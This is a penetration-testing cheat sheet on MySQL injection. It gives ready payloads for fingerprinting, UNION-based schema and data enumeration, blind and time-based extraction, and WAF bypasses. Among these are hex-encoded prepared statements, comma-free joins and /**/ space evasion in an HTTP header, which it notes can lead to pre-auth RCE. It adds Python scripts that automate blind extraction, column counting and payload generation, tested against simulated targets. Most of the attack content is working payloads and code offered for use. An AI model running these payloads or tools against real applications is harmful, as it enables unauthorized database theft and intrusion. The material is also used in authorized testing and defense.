MySQL injection
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Comments

```sql
-- MySQL comment (the second dash must be followed by whitespace or a control character)
# MySQL comment
/* MySQL comment */
/*! MySQL-specific SQL: executed by MySQL, treated as a plain comment by other servers */
/*!32302 10*/ Executed (here: the literal 10) only when the MySQL version is 3.23.02 or newer; older servers skip it as a comment
```
Interesting Functions

Confirm MySQL:

```sql
concat('a','b')
database()
version()
user()
system_user()
@@version
@@datadir
rand()
floor(2.9)
length(1)
count(1)
```
Useful functions

```sql
SELECT hex(database())
SELECT conv(hex(database()),16,10) # Hexadecimal -> Decimal
SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD') # ENCODE()/DECODE() round-trip (both removed in MySQL 8.0)
SELECT uncompress(compress(database())) # COMPRESS()/UNCOMPRESS() round-trip (binary string output)
SELECT replace(database(),"r","R")
SELECT substr(database(),1,1)='r'
SELECT substring(database(),1,1)=0x72
SELECT ascii(substring(database(),1,1))=114
SELECT database()=char(114,101,120,116,101,115,116,101,114)
SELECT group_concat(<COLUMN>) FROM <TABLE>
SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))
SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)
```

Also useful: strcmp(), mid(), lpad(), rpad(), left(), right(), instr(), sleep()
All-in-one injection

```sql
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
```

Whichever quoting context the input lands in (double quotes, single quotes or none), one branch of the payload becomes a delay expression; BENCHMARK() stands in for SLEEP() on old 4.x servers that do not have SLEEP().

from https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/
Flow

Note that in "modern" versions of MySQL you can replace "information_schema.tables" with "mysql.innodb_table_stats" (this can be useful to bypass WAFs, but the application's account needs read access to the mysql schema).

```sql
SELECT table_name FROM information_schema.tables WHERE table_schema=database(); # Get the names of the tables
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; # Get the names of the columns of the table
SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; # Get values
SELECT user FROM mysql.user WHERE file_priv='Y'; # Users with file privileges
```
Only 1 value

```sql
group_concat()
LIMIT X,1
```
Blind one by one

Equivalent ways of testing the single character at position X:

```sql
substr(version(),X,1)='r'
substring(version(),X,1)=0x70
ascii(substr(version(),X,1))=112
mid(version(),X,1)='5'
```
Blind adding

```sql
LPAD(version(),1...length(version()),'1')='asd'...
RPAD(version(),1...length(version()),'1')='asd'...
SELECT RIGHT(version(),1...length(version()))='asd'...
SELECT LEFT(version(),1...length(version()))='asd'...
SELECT INSTR('foobarbar', 'fo...')=1
```
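The following is an added example, not code from the original page: it automates the "blind one by one" and "blind adding" probes above, but instead of testing every candidate character with `=` it binary-searches `ascii(substr(expr,pos,1))>n`, so each character costs 8 requests instead of up to ~95. `oracle` is an assumed callback that injects one boolean condition and reports whether the application behaved as it does for a true condition; `SIMULATED_DB` and `simulated_oracle` are a constructed stand-in for the database so the loop runs offline.

```python
# Added example (not part of the original page): automating the "blind one by one" and
# "blind adding" probes with a binary search over ascii(substr(expr,pos,1)).
# `oracle` is an assumed callback: it injects one boolean condition and returns True when
# the application behaved as it does for a true condition (for time-based injection,
# wrap the condition in IF(cond,SLEEP(2),0) and return True when the response was slow).
import re


def length_condition(expr: str, n: int) -> str:
    """MySQL condition that is true when LENGTH(expr) > n."""
    return f"length({expr})>{n}"


def char_condition(expr: str, pos: int, n: int) -> str:
    """MySQL condition that is true when the byte at 1-based position pos of expr is > n."""
    return f"ascii(substr({expr},{pos},1))>{n}"


def smallest_false(cond, lo: int, hi: int) -> int:
    """Binary search for the smallest v in [lo, hi] with cond(v) False.
    cond must be True for every value below that point and False from it on."""
    while lo < hi:
        mid = (lo + hi) // 2
        if cond(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def find_length(oracle, expr: str, max_len: int = 256) -> int:
    # LENGTH(expr) > v is true exactly for v < LENGTH(expr): the first false v is the length
    return smallest_false(lambda v: oracle(length_condition(expr, v)), 0, max_len)


def find_char(oracle, expr: str, pos: int) -> str:
    # ascii(...) > v is true exactly for v < ascii: the first false v is the byte value
    return chr(smallest_false(lambda v: oracle(char_condition(expr, pos, v)), 0, 255))


def extract(oracle, expr: str) -> str:
    """Recover the full value of a MySQL expression through the boolean oracle."""
    n = find_length(oracle, expr)
    return "".join(find_char(oracle, expr, i) for i in range(1, n + 1))


class CountingOracle:
    """Wraps an oracle and counts requests, to compare extraction strategies."""
    def __init__(self, fn):
        self.fn, self.requests = fn, 0

    def __call__(self, condition: str) -> bool:
        self.requests += 1
        return self.fn(condition)


def extract_with_count(oracle_fn, expr: str):
    """Run extract() and report how many injected conditions it needed."""
    o = CountingOracle(oracle_fn)
    return extract(o, expr), o.requests


# Constructed stand-in for the database: evaluates the two condition shapes above against
# made-up values so the extraction loop can be exercised offline.
SIMULATED_DB = {"version()": "8.0.36", "database()": "rextester"}


def simulated_oracle(condition: str) -> bool:
    m = re.fullmatch(r"length\((.+)\)>(\d+)", condition)
    if m:
        return len(SIMULATED_DB[m.group(1)]) > int(m.group(2))
    m = re.fullmatch(r"ascii\(substr\((.+),(\d+),1\)\)>(\d+)", condition)
    if m:
        value, pos, n = SIMULATED_DB[m.group(1)], int(m.group(2)), int(m.group(3))
        return pos <= len(value) and ord(value[pos - 1]) > n
    raise ValueError(f"unexpected condition: {condition}")


if __name__ == "__main__":
    value, requests = extract_with_count(simulated_oracle, "version()")
    print(value, "in", requests, "requests")  # 8.0.36 in 56 requests
```

The search works byte-wise, so for values that may contain multi-byte characters extract `hex(expr)` instead and decode it afterwards; for a time-based oracle the same code applies, only the callback changes.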
Detect number of columns

Using a simple ORDER BY: it fails with "Unknown column 'N' in 'order clause'" once N exceeds the number of columns the original query selects, so the largest N that still works is the column count.

```sql
order by 1
order by 2
order by 3
...
order by XXX
```

Or a UNION, adding one column at a time until the column counts match:

```sql
UniOn SeLect 1
UniOn SeLect 1,2
UniOn SeLect 1,2,3
...
```
MySQL Union Based

```sql
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
```
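As an added example (not from the original page), the following drives the ORDER BY column-count probe and builds the UNION payloads of the two sections above, with table names written as hex literals so no quotes are needed. `probe` is an assumed callback that sends a payload and returns True when the page came back without a database error; `simulated_probe` and `SIMULATED_COLUMNS` are a constructed stand-in for a target whose query selects four columns.

```python
# Added example (not from the original page): ORDER BY column counting and UNION payload
# generation. `probe` is an assumed callback: True when the injected query did not error.
import re


def order_by_payload(n: int) -> str:
    return f"' ORDER BY {n}-- -"


def find_column_count(probe, max_cols: int = 64) -> int:
    """ORDER BY n errors ("Unknown column 'n' in 'order clause'") once n exceeds the number
    of columns selected by the original query, so the last n that works is the count."""
    for n in range(1, max_cols + 1):
        if not probe(order_by_payload(n)):
            if n == 1:
                raise RuntimeError("ORDER BY 1 failed: injection point not working as assumed")
            return n - 1
    raise RuntimeError(f"more than {max_cols} columns, or errors are not visible")


def hex_literal(s: str) -> str:
    """String as a MySQL hex literal (0x...), so the payload needs no quote characters."""
    return "0x" + s.encode().hex()


def union_payload(ncols: int, slot: int, expr: str, tail: str = "") -> str:
    """UNION SELECT with `expr` in the column (1-based `slot`) whose value the page reflects;
    every other column keeps its number so the column count matches."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot - 1] = expr
    return "' UNION SELECT " + ",".join(cols) + (" " + tail if tail else "") + "-- -"


def group_concat(col: str) -> str:
    """Concatenate all rows of `col` into the single reflected value, '|'-separated (0x7c)."""
    return f"gRoUp_cOncaT(0x7c,{col},0x7c)"


def enumeration_payloads(ncols: int, slot: int, table: str = "") -> list:
    """The schemas -> tables -> columns chain from the section, as ready-to-send payloads."""
    steps = [
        union_payload(ncols, slot, group_concat("schema_name"),
                      "FROM information_schema.schemata"),
        union_payload(ncols, slot, group_concat("table_name"),
                      "FROM information_schema.tables WHERE table_schema=database()"),
    ]
    if table:
        steps.append(union_payload(ncols, slot, group_concat("column_name"),
                                   f"FROM information_schema.columns WHERE table_name={hex_literal(table)}"))
    return steps


# Constructed simulation of a target whose original query selects 4 columns.
SIMULATED_COLUMNS = 4


def simulated_probe(payload: str) -> bool:
    n = int(re.search(r"ORDER BY (\d+)", payload).group(1))
    return n <= SIMULATED_COLUMNS


if __name__ == "__main__":
    ncols = find_column_count(simulated_probe)
    for p in enumeration_payloads(ncols, slot=3, table="users"):
        print(p)
```

The reflected `slot` is found by sending `union_payload(ncols, i, "'marker'")` style probes and looking for which numbered column appears in the response; the `0x7c` separators let you split the group_concat result back into rows.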
SSRF

Learn here the different options to abuse a MySQL injection to obtain SSRF.
WAF bypass tricks

Executing queries through Prepared Statements

When stacked queries are allowed, it may be possible to bypass WAFs by assigning the hex value of the query you want to execute to a variable (using SET), and then using the PREPARE and EXECUTE MySQL statements to finally execute that query. Something like this:

```sql
0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #
```

For more information please refer to this blog post.
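Added example, not from the original page: a builder for the hex-encoded PREPARE/EXECUTE payload above and the matching decoder. The decoder is the defender's side of the same trick: a `SET @query = 0x...` in the general or audit log says nothing until the hex is turned back into the statement that actually ran. The `0);` prefix and the variable/statement names are taken from the page's payload and are parameters here.

```python
# Added example (not from the original page): hex-encoded PREPARE/EXECUTE payload builder
# and decoder. The prefix "0); " closes the original statement as in the page's example.
import re


def hex_literal(query: str) -> str:
    """MySQL hex literal for an arbitrary query: no quotes or SQL keywords survive in the payload."""
    return "0x" + query.encode().hex()


def prepared_statement_payload(query: str, prefix: str = "0); ", name: str = "stmt") -> str:
    """Stacked-query payload that stores `query` in a user variable and runs it as a prepared
    statement. The WAF only sees SET/PREPARE/EXECUTE and a hex blob."""
    return (f"{prefix}SET @query = {hex_literal(query)}; "
            f"PREPARE {name} FROM @query; EXECUTE {name}; #")


def decode_prepared_statements(logged: str) -> list:
    """Recover the plaintext of every `SET @var = 0x...` found in a logged statement."""
    return [bytes.fromhex(h).decode("utf-8", "replace")
            for h in re.findall(r"SET\s+@\w+\s*=\s*0x([0-9a-fA-F]+)", logged)]


if __name__ == "__main__":
    p = prepared_statement_payload("SELECT SLEEP(1)")
    print(p)
    print(decode_prepared_statements(p))  # ['SELECT SLEEP(1)']
```

A detection rule on `PREPARE ... FROM @` combined with a hex-literal assignment catches this pattern regardless of what the encoded query contains.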
Alternatives to information_schema

Note that in "modern" versions of MySQL you can replace information_schema.tables with mysql.innodb_table_stats, or with sys.x$schema_flattened_keys, or with sys.schema_table_statistics (all of these need read access to the mysql or sys schema, which the application's account may not have).
MySQL injection without COMMAS

Select 2 columns without using any comma (https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma):

```sql
-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
```
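As an added example (not from the original page or the linked answer), the following generalises the JOIN trick to any number of columns and adds two other comma-free spellings a filter on `,` usually misses: `substr(x FROM p FOR n)` for `substr(x,p,n)` and `LIMIT n OFFSET o` for `LIMIT o,n`. Both are standard MySQL syntax; the `-1' UNION SELECT * FROM` prefix and the `UTn` aliases are taken from the page's payload.

```python
# Added example (not from the original page): comma-free payload builders. MySQL's JOIN
# needs no ON clause (it is then a cross join), so N derived tables joined together yield
# N columns without a single comma.


def commaless_union(subqueries: list, prefix: str = "-1' UNION SELECT * FROM ",
                    suffix: str = "#") -> str:
    """(SELECT a)UT1 JOIN (SELECT b)UT2 JOIN ... : each derived table supplies one column."""
    parts = [f"(SELECT {q})UT{i}" for i, q in enumerate(subqueries, start=1)]
    payload = prefix + " JOIN ".join(parts) + suffix
    if "," in payload:
        raise ValueError("a subquery reintroduced a comma")
    return payload


def commaless_substr(expr: str, pos: int, length: int = 1) -> str:
    """substr(x,pos,len) written with the FROM/FOR syntax, which MySQL also accepts."""
    return f"substr({expr} from {pos} for {length})"


def commaless_limit(offset: int, count: int = 1) -> str:
    """LIMIT offset,count written as LIMIT count OFFSET offset."""
    return f"LIMIT {count} OFFSET {offset}"


if __name__ == "__main__":
    print(commaless_union(["1", "table_name FROM mysql.innodb_table_stats"]))
    # one row per table, with version()'s 3rd character in the third column:
    print(commaless_union(["1", "table_name FROM mysql.innodb_table_stats",
                           commaless_substr("version()", 3)]))
    print(commaless_limit(2))
```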
Getting values without column names

If at some point you know the name of the table but you don't know the names of the columns inside it, you can try to find out how many columns there are by executing something like:

```sql
# The comparison errors with "Operand should contain N column(s)" until the number of values matches the table's column count
select (select "", "") = (SELECT * from demo limit 1); # 2 columns
select (select "", "", "") < (SELECT * from demo limit 1); # 3 columns
```

Assuming there are 2 columns (the first one being the ID) and the other one being the flag, you can try to bruteforce the content of the flag char by char with `<`/`>` comparisons on the guessed prefix; `=` confirms the full value:

```sql
# When True, you found the correct value and can start bruteforcing the next position
select (select 1, 'flaf') = (SELECT * from demo limit 1);
```

More info in https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952
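The following is an added example (not from the original page or the linked post) that automates the row-comparison trick above: it finds the column count from the arity error, then recovers the ID with an integer binary search and the flag one character at a time with prefix comparisons, never naming a column. `SAMPLE_ROW` and `row_compare_oracle` are a constructed stand-in for `SELECT * FROM demo LIMIT 1` and for the application's true/false/error behaviour, so it runs offline.

```python
# Added example (not from the original page): automating the "no column names" trick.
# SAMPLE_ROW is a constructed stand-in for the result of `SELECT * FROM demo LIMIT 1`, and
# row_compare_oracle stands in for sending
#   select (select <candidate row>) <op> (SELECT * FROM demo LIMIT 1)
# and observing whether the application errors, or behaves as for true or false.
SAMPLE_ROW = (7, "flag{constructed}")


def row_compare_oracle(candidate: tuple, op: str) -> bool:
    # MySQL raises "Operand should contain N column(s)" when the row arities differ; that
    # error is what reveals the column count. Otherwise rows compare lexicographically:
    #   (a,b) <= (x,y)   <=>   a < x OR (a = x AND b <= y)
    # which Python's tuple comparison reproduces for a binary collation (see note below).
    if len(candidate) != len(SAMPLE_ROW):
        raise RuntimeError(f"Operand should contain {len(SAMPLE_ROW)} column(s)")
    if op == "=":
        return candidate == SAMPLE_ROW
    if op == "<=":
        return candidate <= SAMPLE_ROW
    raise ValueError(op)


def find_arity(oracle, max_cols: int = 16) -> int:
    """Grow a tuple of empty strings until the comparison stops erroring."""
    for n in range(1, max_cols + 1):
        try:
            oracle(("",) * n, "=")
            return n
        except RuntimeError:
            continue
    raise RuntimeError(f"no arity up to {max_cols} accepted")


def smallest_false(cond, lo: int, hi: int) -> int:
    """Smallest v in [lo, hi] with cond(v) False; cond is True below that point, False from it on."""
    while lo < hi:
        mid = (lo + hi) // 2
        if cond(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_int(oracle, known: tuple, ncols: int, hi: int = 2**31) -> int:
    """Next column is an integer: (known..., v, "", ...) <= row holds exactly for v <= value."""
    pad = lambda v: known + (v,) + ("",) * (ncols - len(known) - 1)
    return smallest_false(lambda v: oracle(pad(v), "<="), 0, hi) - 1


def extract_str(oracle, known: tuple, ncols: int, max_len: int = 128) -> str:
    """Next column is a string, recovered one character at a time by prefix comparison."""
    pad = lambda s: known + (s,) + ("",) * (ncols - len(known) - 1)
    out = ""
    for _ in range(max_len):
        # (known..., out + chr(v)) <= row holds exactly for v <= next char. Once `out` is the
        # whole value every longer candidate compares greater, so no v >= 1 satisfies it.
        v = smallest_false(lambda c: oracle(pad(out + chr(c)), "<="), 1, 128)
        if v == 1:
            break
        out += chr(v - 1)
    return out


def extract_row(oracle, types=(int, str)) -> tuple:
    """Recover a whole row given the column types, left to right."""
    ncols = find_arity(oracle)
    if ncols != len(types):
        raise RuntimeError(f"table has {ncols} columns, {len(types)} types given")
    row = ()
    for t in types:
        row += ((extract_int if t is int else extract_str)(oracle, row, ncols),)
    return row


if __name__ == "__main__":
    print(extract_row(row_compare_oracle))  # (7, 'flag{constructed}')
```

Caveat: the simulation compares bytes. On a real server string comparison follows the column's collation: with the default `_ci` collations letter case is folded and ordering follows collation weights, and PAD SPACE collations ignore trailing spaces, so the recovered value may differ in case from what is stored. Finish with the page's `=` check on the full row (or compare against `BINARY` values where the syntax allows it) to confirm.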
Injection without SPACES (/**/ comment trick)

Some applications sanitise or parse user input with functions such as sscanf("%128s", buf), which stop at the first whitespace character. Because MySQL treats the sequence /**/ as a comment and as whitespace, it can be used to remove every regular space from the payload while keeping the query syntactically valid.

Example of a time-based blind injection that bypasses the space filter:

```http
GET /api/fabric/device/status HTTP/1.1
Authorization: Bearer AAAAAA'/**/OR/**/SLEEP(5)--/**/-'
```

Which the database receives as:

```sql
' OR SLEEP(5)-- -'
```

This is especially useful when:
- The controllable buffer has a size limit (e.g. %128s) and spaces would terminate the input early.
- Injecting through HTTP headers or other places where regular spaces are stripped or used as separators.
- Combined with INTO OUTFILE primitives to reach full pre-auth RCE (see the MySQL File RCE section).
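Added example, not from the original page or the referenced advisory: a reproduction of the filter this section describes, used to check a payload before sending it. `scanf_s` mirrors the behaviour of C's `%128s` conversion (skip leading whitespace, copy non-whitespace characters until whitespace or the field width); the `SPACED` header value is constructed for the example, and `FIELD_WIDTH` is the 128 from the section.

```python
# Added example (not from the original page): emulating the sscanf("%128s") filter and
# rewriting a payload so that it survives it. The header value below is constructed.
import re

FIELD_WIDTH = 128  # the %128s width from the section


def scanf_s(text: str, width: int = FIELD_WIDTH) -> str:
    """Emulates one C `%<width>s` conversion: leading whitespace skipped, then non-whitespace
    characters copied until whitespace or `width` characters."""
    return re.match(r"\s*(\S{0,%d})" % width, text).group(1)


def despace(payload: str) -> str:
    """Replace every space with /**/, which MySQL parses as whitespace, and check the result
    would still pass the scan in one piece (tabs/newlines are not replaced; length grows by 3
    per space and must stay within the field width)."""
    out = payload.replace(" ", "/**/")
    if re.search(r"\s", out):
        raise ValueError("payload still contains whitespace")
    if len(out) > FIELD_WIDTH:
        raise ValueError(f"payload is {len(out)} chars, over the {FIELD_WIDTH}-char field")
    return out


def as_parsed_by_mysql(payload: str) -> str:
    """Equivalent query text: each /**/ is a token separator, i.e. acts like a space."""
    return payload.replace("/**/", " ")


def survives_filter(payload: str) -> bool:
    """True when the whole payload reaches the query after the %128s scan."""
    return scanf_s(payload) == payload


SPACED = "AAAAAA' OR SLEEP(5)-- -'"   # constructed: the naive, space-separated payload
COMPACT = despace(SPACED)              # AAAAAA'/**/OR/**/SLEEP(5)--/**/-'

if __name__ == "__main__":
    print("filter keeps:", scanf_s(SPACED))          # AAAAAA'
    print("filter keeps:", scanf_s(COMPACT))         # the whole payload
    print("server parses:", as_parsed_by_mysql(COMPACT))
```

Note on the tail: MySQL only treats `--` as a comment when it is followed by whitespace. With `/**/` directly after it, `--/**/-'` is instead parsed as `- - -` applied to the application's own closing quote, which is still a valid expression, so the payload works either way.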
MySQL history

You can see other executions inside MySQL by reading the table: sys.x$statement_analysis

Version alternatives

```sql
mysql> select @@innodb_version;
mysql> select @@version;
mysql> select version();
```

Other MySQL injection guides

References
- PayloadsAllTheThings – MySQL Injection cheatsheet
- Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)